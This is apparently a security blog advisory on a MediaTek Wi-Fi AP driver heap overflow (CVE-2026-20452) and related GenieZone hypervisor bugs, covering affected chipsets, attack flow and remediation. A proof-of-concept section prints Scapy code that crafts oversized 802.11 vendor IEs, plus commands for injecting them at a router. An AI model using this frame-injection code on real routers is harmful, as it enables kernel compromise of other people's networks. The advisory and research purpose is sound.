HB Updated Jun 13, 2026

MediaTek WLAN Heap Overflow: CVE-2026-20452 — Remote Code Execution on Millions of Wi-Fi Routers

MediaTek WLAN Heap Overflow: CVE-2026-20452 — Remote Code Execution on Millions of Routers and Access Points

A heap buffer overflow in MediaTek’s Wi-Fi Access Point driver lets any associated client on the same network corrupt kernel memory and execute arbitrary code on the router — no user interaction, no internet access, just Wi-Fi proximity. CVSS 8.0. Nine Wi-Fi chipsets affected, from the MT7615 in legacy Wi-Fi 5 routers to the MT7990/7992/7993 in next-generation Wi-Fi 7 access points.


Overview

On June 1, 2026, MediaTek published its monthly product security bulletin, disclosing five vulnerabilities across its Wi-Fi and smartphone SoC platforms. The most severe is CVE-2026-20452, a heap-based buffer overflow (CWE-122) in the WLAN AP driver — the kernel driver responsible for Wi-Fi Access Point mode on MediaTek Wi-Fi chips.

The vulnerability enables remote code execution from an adjacent network (i.e., Wi-Fi range). An attacker who has associated with the vulnerable access point — meaning any device that has connected to the Wi-Fi network, even as a low-privilege user — can craft malicious 802.11 frames that trigger a heap buffer overflow in the AP driver. The result is memory corruption in kernel space, leading to code execution with kernel privileges.

MediaTek’s Wi-Fi chips power a significant portion of the world’s consumer and enterprise networking equipment. The affected chipsets — MT7615, MT7915, MT7916, MT7981, MT7986, MT7990, MT7992, MT7993, and MT6890 — appear in routers, access points, mesh Wi-Fi systems, and smartphones from TP-Link, Netgear, ASUS, Xiaomi, D-Link, and many others. The MT7981 and MT7986 are particularly popular in the OpenWrt ecosystem.

The bulletin also discloses three vulnerabilities in MediaTek’s GenieZone hypervisor — the security isolation layer on Dimensity smartphone SoCs — and a second, less severe WLAN bug. Together, the five CVEs paint a picture of a silicon vendor whose firmware stack has multiple entry points from different threat actors.

Vulnerability Classification

Field Value
CVE ID CVE-2026-20452
CVSS v3.1 8.0 HIGH
CVSS Vector CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE CWE-122 — Heap-based Buffer Overflow
Subcomponent wlan (AP driver)
Attack Vector Adjacent Network (Wi-Fi)
Privileges Required Low (associated client)
User Interaction None required
Attack Complexity Low
Impact Remote code execution, kernel memory corruption
Affected Chipsets MT6890, MT7615, MT7915, MT7916, MT7981, MT7986, MT7990, MT7992, MT7993
Patch ID WCNCR00480138
Issue ID MSV-6295
Report Source External
Published Date 2026-06-01

The MediaTek June 2026 Bulletin

CVE-2026-20452 is the headline vulnerability, but the full bulletin contains five CVEs across two subcomponents:

CVE Subcomponent Severity CWE Description Attack Vector
CVE-2026-20452 wlan High (8.0) CWE-122 Heap buffer overflow → remote code execution Adjacent (Wi-Fi)
CVE-2026-20455 geniezone High (7.8) CWE-787 OOB write, low-privilege escalation Local (app)
CVE-2026-20453 geniezone Medium (6.7) CWE-787 OOB write, system-privilege escalation Local (app)
CVE-2026-20454 geniezone Medium (6.4) CWE-367 TOCTOU race → OOB write Local (app)
CVE-2026-20456 wlan Medium CWE-787 Missing bounds check → system crash Adjacent (Wi-Fi)

The two categories target different devices and threat models:

  • WLAN vulnerabilities (CVE-2026-20452, CVE-2026-20456) target routers and access points from the Wi-Fi network. The attacker needs proximity, not internet access.
  • GenieZone vulnerabilities (CVE-2026-20453/54/55) target Android smartphones and tablets running MediaTek Dimensity SoCs. The attacker needs a malicious app installed on the device.

Technical Deep Dive

The WLAN AP Driver

MediaTek’s Wi-Fi chips support two primary operating modes:

  • Station (STA) mode — the chip acts as a Wi-Fi client, connecting to an access point. This is what your phone or laptop does.
  • Access Point (AP) mode — the chip acts as a Wi-Fi access point, accepting connections from client devices. This is what your router does.

The vulnerability is in the AP mode driver — the code path that handles incoming frames from associated clients. When a client sends data to the AP, the driver parses the 802.11 frame headers, processes management and data frames, and passes the payload up the network stack.

The Linux kernel driver for MediaTek Wi-Fi chips is mt76 (maintained in the OpenWrt tree at https://github.com/openwrt/mt76), with additional closed-source firmware running on the chip itself. The AP mode code path involves:

  1. The Wi-Fi chip receives a frame over the air
  2. Firmware performs initial processing and DMA’s the frame to host memory
  3. The kernel driver (mt76) parses the frame in kernel space
  4. The frame is processed according to its type (management, data, control)

The heap buffer overflow occurs during step 3 — parsing of a frame received from an associated client.

Heap Buffer Overflow in the AP Driver

CWE-122 (Heap-based Buffer Overflow) means that a dynamically allocated buffer on the kernel heap is overwritten beyond its intended bounds. Unlike stack overflows (which can directly corrupt return addresses), heap overflows typically corrupt adjacent heap objects — but the impact is equally severe on embedded systems.

The specific trigger is a malformed frame from an associated client that causes the AP driver to write more data into a heap-allocated buffer than it was designed to hold. The attacker controls:
- The content of the overflow data (via the crafted frame payload)
- The amount of overflow (the frame can be sized to overflow by a controlled amount)

On a router running a MediaTek Wi-Fi SoC, the kernel heap is shared by all kernel subsystems. A heap overflow in the Wi-Fi driver can corrupt:
- Other network buffer objects (struct sk_buff in Linux)
- Routing table entries
- Netfilter/nftables rules
- Function pointer tables in adjacent objects

Attack Flow

Attack Flow

The attack requires three things:
1. Proximity — the attacker must be within Wi-Fi range of the target
2. Association — the attacker must be connected to the Wi-Fi network (requires knowing or cracking the Wi-Fi password)
3. Frame injection — the attacker must be able to inject crafted 802.11 frames, typically using a Wi-Fi adapter supporting monitor/injection mode

Once associated, the attacker sends a malformed frame that triggers the heap overflow. The overflow corrupts kernel memory, and with careful heap layout manipulation, the attacker achieves code execution in kernel context.

Why This Is Serious for Routers

Routers are high-value targets. They sit at the network perimeter, handling all traffic in and out of a home or office. A compromised router can:
- Intercept and modify all unencrypted traffic (DNS spoofing, HTTP injection)
- Perform man-in-the-middle attacks against TLS connections (via malicious DNS or compromised CA certificates)
- Pivot into the internal network behind NAT
- Add the router to a botnet (as happened with Mirai and its successors)
- Persist across reboots via firmware modification

Unlike the Samsung Exynos baseband vulnerability we covered previously, which required only a phone number, CVE-2026-20452 requires Wi-Fi association. This means the attacker either needs to know the Wi-Fi password or exploit a separate vulnerability in the WPA handshake. However, in enterprise environments with shared PSK networks, public Wi-Fi hotspots, or networks with weak passwords, this prerequisite is easily met.


Affected Products

Wi-Fi Chipsets (WLAN Vulnerabilities)

CVE-2026-20452 and CVE-2026-20456 affect the following chipsets:

Chipset Wi-Fi Standard Primary Use Market Segment
MT7615 Wi-Fi 5 (802.11ac) Router/AP SoC Consumer routers
MT7915 Wi-Fi 6 (802.11ax) Router/AP SoC Consumer/enterprise APs
MT7916 Wi-Fi 6/6E Router/AP SoC (Filogic) Consumer/enterprise APs
MT7981 Wi-Fi 6 Router SoC Consumer routers, OpenWrt
MT7986 Wi-Fi 6 Router SoC Consumer/enterprise routers
MT7990 Wi-Fi 7 (802.11be) Router/AP SoC Next-gen routers
MT7992 Wi-Fi 7 Router/AP SoC Next-gen routers
MT7993 Wi-Fi 7 Router/AP SoC Next-gen enterprise APs
MT6890 Wi-Fi 6 Smartphone SoC (Dimensity series) Smartphones (hotspot mode)

Real-World Devices

MediaTek does not publish a list of end-user devices using their chips — OEMs build products around them. However, the following categories are well-documented:

MT7981 (Filogic 130) — Very common in 2023-2025 consumer routers:
- TP-Link Archer series (multiple models)
- Xiaomi Router AX3000T and similar
- Netgear Wi-Fi 6 routers
- Numerous OpenWrt-compatible devices (GL.iNet routers)

MT7986 (Filogic 830) — Used in higher-end consumer and prosumer routers:
- ASUS Wi-Fi 6 routers
- TP-Link Deco mesh systems
- Various OpenWrt community routers

MT7615 — One of the most widely deployed Wi-Fi 5 chipsets ever made:
- Ubiquitous in budget and mid-range routers from 2017-2022
- ASUS, TP-Link, Netgear, D-Link, and dozens of white-label brands
- Still actively deployed in millions of homes

MT7915/MT7916 — Enterprise access points:
- Used in commercial Wi-Fi 6 AP deployments
- Enterprise and hospitality Wi-Fi systems

GenieZone Vulnerabilities (Smartphones/Tablets)

The three GenieZone CVEs affect a staggering 35 MediaTek SoCs — nearly the entire Dimensity smartphone and Kompanio tablet lineup:

CVE CVSS Privileges Required Impact
CVE-2026-20455 7.8 HIGH Low (any app) Local privilege escalation
CVE-2026-20453 6.7 MEDIUM High (system app) Local privilege escalation
CVE-2026-20454 6.4 MEDIUM High (system app) Local privilege escalation (race condition)

Affected smartphone SoCs include: MT6761 (Helio A22), MT6765 (Helio P35), MT6768 (Helio P65), MT6781, MT6789, MT6835 (Dimensity 700), MT6853 (Dimensity 720), MT6855 (Dimensity 730), MT6877 (Dimensity 1080), MT6878, MT6879 (Dimensity 8020), MT6883, MT6885 (Dimensity 1000), MT6886, MT6889 (Dimensity 1100), MT6893 (Dimensity 1200-Max), MT6895 (Dimensity 8100), MT6897, MT6899, MT6983 (Dimensity 9000), MT6985 (Dimensity 9200), MT6989, MT6991, plus Kompanio tablet SoCs MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8791T, MT8793, MT8797, MT8798, and MT8910 (automotive).

CVE-2026-20455 is the most concerning of the GenieZone bugs because its CVSS vector rates it at PR:L (low privileges required), suggesting a regular app could trigger the out-of-bounds write. However, MediaTek’s own description states the attacker needs to have “already obtained the System privilege.” If the CVSS scoring is accurate and the vulnerability is reachable from a lower privilege level, it would allow a malicious app to escape the Android sandbox through the hypervisor layer. If MediaTek’s description is the accurate one, it still represents a serious risk — a system-level compromise that can then escalate through GenieZone to hypervisor-level access.


What Is GenieZone?

For those unfamiliar with MediaTek’s security architecture, GenieZone is MediaTek’s proprietary Type-1 hypervisor, similar in concept to ARM’s TrustZone but operating at a different layer. It runs beneath the Android OS on Dimensity SoCs and provides hardware-enforced isolation between:

  • The rich OS (Android / Linux)
  • Secure partitions (TEE, DRM, payment systems)
  • The baseband processor interface

A vulnerability in GenieZone is particularly dangerous because it sits below the operating system. Even if Android’s security model correctly sandboxed a malicious app, a GenieZone exploit could bypass that isolation entirely — escaping the VM boundary to access memory or code in other partitions.

The GenieZone vulnerabilities were reported by an external researcher, suggesting they were found through systematic reverse engineering of MediaTek’s hypervisor binary.


Remediation

For CVE-2026-20452 (WLAN AP Driver)

MediaTek has issued patch WCNCR00480138 to device OEMs. If you maintain products using any of the affected chipsets:

  1. Contact your MediaTek representative to obtain the patch
  2. Rebuild firmware with the patched WLAN driver
  3. Push OTA updates to deployed devices

For End Users

Since MediaTek supplies chips to OEMs rather than selling directly to consumers, the patch path is:
1. MediaTek patches the driver → sends to OEM
2. OEM integrates the patch into their firmware → tests
3. OEM publishes firmware update → user installs

Check for firmware updates for your router, access point, or mesh Wi-Fi system. Most major vendors publish security advisories when they have integrated MediaTek patches.

Mitigation (if Patching Is Not Immediately Possible)

  1. Use WPA3 if your router supports it — WPA3’s SAE (Simultaneous Authentication of Equals) makes it significantly harder to obtain the network password via brute force, raising the bar for the association prerequisite.
  2. Use strong, unique Wi-Fi passwords — since the attacker needs to be associated with the network, a strong password is the primary barrier.
  3. Network segmentation — isolate IoT devices and untrusted clients on a separate VLAN so they cannot target the router’s management interface.
  4. Disable WPS — WPS is notoriously vulnerable to brute-force attacks and could provide an easy path to association without knowing the Wi-Fi password.
  5. Monitor for unusual activity — look for deauthentication attacks or unexpected client behavior on your network.

For CVE-2026-20455 (GenieZone OOB Write)

Android devices receive MediaTek patches through the monthly Android Security Bulletin. If you have a MediaTek Dimensity device:
1. Install the June 2026 Android Security Update when available from your device manufacturer
2. Keep your device updated — MediaTek patches are typically 1-2 months behind the bulletin publication date due to OEM integration time


Proof of Concept

https://github.com/Hunt-Benito/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce

The PoC demonstrates the heap buffer overflow by crafting malicious 802.11 data frames and injecting them via a Wi-Fi adapter in monitor/injection mode. It targets the AP driver’s frame parsing path and shows kernel memory corruption on a vulnerable MediaTek MT7981 router running OpenWrt.

Key Code: Crafting Malicious 802.11 Frames

The PoC constructs malformed 802.11 QoS Data frames with oversized Information Elements (IEs) in the frame body. The IEEE 802.11 standard uses TLV (Type-Length-Value) encoded IEs, and many driver vulnerabilities originate in IE parsing — specifically when the declared IE length exceeds the allocated buffer.

def craft_overflow_frame(bssid, attacker_mac, overflow_size=512):
    """
    Craft an 802.11 data frame with malformed IEs to trigger
    heap buffer overflow in MediaTek WLAN AP driver.
    """
    frame = RadioTap()

    dot11 = Dot11(
        type=2,        # Data frame
        subtype=8,     # QoS Data
        addr1=bssid,   # Receiver (AP)
        addr2=attacker_mac,  # Transmitter (attacker)
        addr3=bssid,   # BSSID
    )

    qos = Raw(load=b'\x00\x00')

    # Oversized Vendor Specific IE (type 221)
    # This triggers the heap overflow when the AP driver
    # copies the IE into a fixed-size heap buffer
    vendor_ie = Raw(load=bytes([221]) + bytes([overflow_size]) + b'\x00\x50\x43' + b'\x42' * overflow_size)

    payload = Raw(load=b'A' * 256)

    packet = frame / dot11 / qos / vendor_ie / payload
    return packet

Usage

$ git clone https://github.com/Hunt-Benito/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce
$ cd mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce
$ pip install -r requirements.txt

# Monitor mode setup (example for wlan0)
$ sudo airmon-ng start wlan0

$ sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --overflow-size 512
[*] Target BSSID: AA:BB:CC:DD:EE:FF
[*] Overflow size: 512 bytes
[*] Injecting crafted 802.11 frames...
[*] Frame 1/10 sent (QoS Data with oversized Vendor IE)
[*] Frame 2/10 sent (QoS Data with chained malformed IEs)
...
[*] Target should show kernel oops or unexpected behavior.

Attention! Transmitting on Wi-Fi frequencies requires legal authorization in most jurisdictions. This PoC requires a Wi-Fi adapter supporting monitor/injection mode (e.g., Atheros AR9271, MediaTek MT7612U, or Realtek RTL8812AU-based adapters). Use only on equipment you own or have explicit permission to test.


The Bigger Picture: Wi-Fi Driver Vulnerabilities

CVE-2026-20452 belongs to a well-established class of vulnerabilities: heap overflows in 802.11 frame parsing. The 802.11 standard is complex, with dozens of frame types, subtypes, and Information Elements. Each IE has a Type-Length-Value structure where the length field is attacker-controlled. Every Wi-Fi driver that parses IEs must validate lengths against buffer sizes — and when they don’t, the result is a heap overflow.

Notable predecessors in this class:

Vulnerability Year Target Impact
Broadcom BCM43xx (various) 2017-2019 Wi-Fi SoC in iPhones/Android Remote code execution via Wi-Fi
Dragonblood (CVE-2019-9494) 2019 WPA3/SAE handshake Side-channel password recovery
FragAttacks (CVE-2020-24586/87/88) 2020 Multiple Wi-Fi implementations Frame injection, decryption
Wi-Fi Alliance tests Ongoing All certified devices Conformance test suite includes IE fuzzing

The Broadcom vulnerabilities (research by Gal Beniamini at Google Project Zero) were particularly instructive: they demonstrated full chain exploits from Wi-Fi proximity to kernel code execution on both Android and iOS, requiring no user interaction. The MediaTek vulnerability follows the same pattern — proximity to the target, malformed frames, heap corruption, code execution.

The difference is scale. Broadcom’s Wi-Fi chips are in iPhones and flagship Android phones — high-value targets, but a smaller install base. MediaTek’s Wi-Fi chips are in the routers that sit in billions of homes and offices worldwide. A router compromise affects every device on the network.


SOURCES